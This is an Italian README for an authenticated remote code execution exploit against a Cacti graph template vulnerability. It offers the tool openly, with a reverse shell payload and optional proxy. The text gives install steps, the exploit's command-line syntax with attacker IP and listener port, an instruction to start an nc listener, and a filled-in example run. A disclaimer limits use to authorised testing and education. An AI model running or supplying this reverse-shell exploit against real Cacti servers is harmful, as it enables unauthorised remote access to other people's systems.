
Exploit di esecuzione remota di codice autenticato per la vulnerabilità del template grafico di Cacti, con payload di reverse shell e supporto proxy per test di penetrazione autorizzati.
Importante — leggi prima questo:
Questo repository eexploit.pysono forniti solo per scopi educativi e di ricerca. Non usare questo codice contro sistemi, reti o servizi per i quali non disponi di esplicita autorizzazione scritta. L'accesso non autorizzato a sistemi informatici è illegale e contrario all'etica. Utilizzando questo codice accetti di rispettare le leggi applicabili e le politiche istituzionali.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Prima di eseguire lo script assicurati di avere un listener nc in esecuzione. Esegui lo script senza proxy, a meno che tu non stia eseguendo il debug:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Promemoria finale: Questo script e questo README sono solo per uso didattico. Non usare mai questi strumenti per accedere illegalmente a sistemi.